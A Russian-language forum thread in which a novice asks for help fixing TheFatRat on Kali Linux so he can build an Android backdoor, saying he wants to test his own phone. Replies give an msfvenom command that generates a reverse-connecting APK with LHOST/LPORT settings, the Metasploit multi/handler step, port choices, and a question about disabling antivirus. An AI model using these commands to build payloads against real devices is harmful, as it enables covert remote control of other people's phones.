• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Помогите разобраться пожалуйста kali linux metasploit

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Всем доброго времени суток. Помогите разобраться пожалуйста. На VirtualBox установлена Kali linux 2020.2 (всё с официальных сайтов)
Хотел протестить свой телефон при помощи FatRat вроде бы всё делал по прочитанной инструкции. но на выходе всегда одна и тажа ошибка связанная с Metasploit (скрины прилагаются) Вопрос: что я делаю не так? Где ошибка?
Нужно ли настраивать саму "машину" при этом если да то как? И такой вопрос нужно ли пользоваться VPN? если не обязательно, то какой мне порт прописывать? Помогите один раз грамотно разобраться пожалуйста...
 

Вложения

  • 1.jpg
    1.jpg
    36 КБ · Просмотры: 289
  • 2.jpg
    2.jpg
    61,7 КБ · Просмотры: 290
  • 3.jpg
    3.jpg
    16 КБ · Просмотры: 266

InetTester

Green Team
21.10.2018
308
43
BIT
0
Не доводилось использовать FatRat но кажется мне что одного запуска msfconsole здесь явно не достаточно и от тебя скорее всего требуется настроить и запустить
use exploit/multi/handler
ps: Но я могу ошибаться ;)
 
Последнее редактирование:

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Я отскринил лишь то конечный результат. и ошибка лишь в
metasploit
от сюда вопрос, как именно её настроить правильно?
как настроить саму машину?
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Вот тебе и форум. Один добрый человек откликнулся. А в остальном тишина... Где же Вы гении?... Ну неужели никто не поможет??????((((((((((((
 

BearSec

Platinum
20.04.2020
209
289
BIT
7
Побольше информации надо. Что за инструкция, другие виды генерации бекдоров ошибки выводят?
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
нет ошибка толька та что указана на скрине
поэтому и вопрос
не правильно настроена сама машина?
что то не настроил в metasploit?
или?...
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Побольше информации надо. Что за инструкция, другие виды генерации бекдоров ошибки выводят?
не правильно понял твой вопрос. Да ошибка всегда одна и таже при любой генерации
 

BearSec

Platinum
20.04.2020
209
289
BIT
7
Похожая проблема была у кого-то
./fatrat: line 2116: $log: ambiguous redirect · Issue #337 · Screetsec/TheFatRat

Открываешь код (если у тебя скачана последняя вкрсия с гитхаба)
И смотришь свою строку с ошибкой номер 2238
Код:
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1
#check file
Судя по строке вызывается msfvenom и пытается начать генерировать относительно твоих параметров.

Так что начни с проверки параметров, которые ты указываешь в fatrat
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Похожая проблема была у кого-то
./fatrat: line 2116: $log: ambiguous redirect · Issue #337 · Screetsec/TheFatRat

Открываешь код (если у тебя скачана последняя вкрсия с гитхаба)
И смотришь свою строку с ошибкой номер 2238
Код:
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1
#check file
Судя по строке вызывается msfvenom и пытается начать генерировать относительно твоих параметров.

Так что начни с проверки параметров, которые ты указываешь в fatrat



Тогда от сюда вытекающий вопрос, если ошибка в параметрах, то вероятно я не правильно указываю порт?
Тогда вопрос какой нужно указать? (указываю тот что предварительно открыл и проверил)
 

BearSec

Platinum
20.04.2020
209
289
BIT
7
Любой незанятый порт. 4444 или 5555 или 1337
Попробуй просто в консоли выполни команду (Вместо $payload указываешь тот, что выбирал в fatrat)
msfvenom -f raw -p $payload LHOST=твой_ip LPORT=1337 -o /root/test.apk
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Любой незанятый порт. 4444 или 5555 или 1337
Попробуй просто в консоли выполни команду (Вместо $payload указываешь тот, что выбирал в fatrat)
msfvenom -f raw -p $payload LHOST=твой_ip LPORT=1337 -o /root/test.apk


То есть мои догадки что это из за порта правильные?
 

BearSec

Platinum
20.04.2020
209
289
BIT
7
То есть мои догадки что это из за порта правильные?
Нет, не правильные. Он ругается на перенаправление в переменную $log.
Скриншотов всех этапов настройки fatrat ты не приложил.
Из имеющихся данных я предложил тебе вручную выполнить команду, которую выполняет fatrat за тебя.

Выложи пошагово скриншоты как ты пытаешься сгенерировать apk.
Опять же запускаешь fatrat от root? Куда логи он у тебя пишет?

Проблема может быть зарыта где угодно, а данных для решения из предоставленных скриншотов не хватает
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Нет, не правильные. Он ругается на перенаправление в переменную $log.
Скриншотов всех этапов настройки fatrat ты не приложил.
Из имеющихся данных я предложил тебе вручную выполнить команду, которую выполняет fatrat за тебя.

Выложи пошагово скриншоты как ты пытаешься сгенерировать apk.
Опять же запускаешь fatrat от root? Куда логи он у тебя пишет?

Проблема может быть зарыта где угодно, а данных для решения из предоставленных скриншотов не хватает


Проблема в том что я fatrat и не настраивал не как(((((
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Нет, не правильные. Он ругается на перенаправление в переменную $log.
Скриншотов всех этапов настройки fatrat ты не приложил.
Из имеющихся данных я предложил тебе вручную выполнить команду, которую выполняет fatrat за тебя.

Выложи пошагово скриншоты как ты пытаешься сгенерировать apk.
Опять же запускаешь fatrat от root? Куда логи он у тебя пишет?

Проблема может быть зарыта где угодно, а данных для решения из предоставленных скриншотов не хватает


ок сейчас скрины сделаю
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Нет, не правильные. Он ругается на перенаправление в переменную $log.
Скриншотов всех этапов настройки fatrat ты не приложил.
Из имеющихся данных я предложил тебе вручную выполнить команду, которую выполняет fatrat за тебя.

Выложи пошагово скриншоты как ты пытаешься сгенерировать apk.
Опять же запускаешь fatrat от root? Куда логи он у тебя пишет?

Проблема может быть зарыта где угодно, а данных для решения из предоставленных скриншотов не хватает
 

Вложения

  • 4.jpg
    4.jpg
    24,9 КБ · Просмотры: 218
  • 5.jpg
    5.jpg
    64,8 КБ · Просмотры: 202
  • 6.jpg
    6.jpg
    49,9 КБ · Просмотры: 188
  • 7.jpg
    7.jpg
    55 КБ · Просмотры: 197
  • 8.jpg
    8.jpg
    56,6 КБ · Просмотры: 185
  • 9.jpg
    9.jpg
    59,9 КБ · Просмотры: 186
  • 10.jpg
    10.jpg
    69 КБ · Просмотры: 194

BearSec

Platinum
20.04.2020
209
289
BIT
7
Первым делом я бы перенёс все из "рабочий стол" в /home/adminus

Русский язык плюс пробелы очень нехорошее сочетание для использование в скриптах
 

InetTester

Green Team
21.10.2018
308
43
BIT
0

1. Ты root в системе?(у твоего пользователя точно есть все необходимые права)
2. Антивирусное ПО выключено?
3. FatRat это скрипт а не бинарник я так предполагаю покажи его строку 2238...
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Первым делом я бы перенёс все из "рабочий стол" в /home/adminus

Русский язык плюс пробелы очень нехорошее сочетание для использование в скриптах


Что мне нужно сделать для того чтоб всё перенести?
(как правильно это сделать)
И как сделать чтоб был английский а не русский?
И что дальше?
 

CrazyMan

Active member
06.07.2020
27
0
BIT
0
1. Ты root в системе?(у твоего пользователя точно есть все необходимые права)
2. Антивирусное ПО выключено?
3. FatRat это скрипт а не бинарник я так предполагаю покажи его строку 2238...


Могу зайти как root пробовал запускать fatrat не всё тоже самое
Антивирус работает
я не знаю как показать строку 2238 которую ты попросил
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!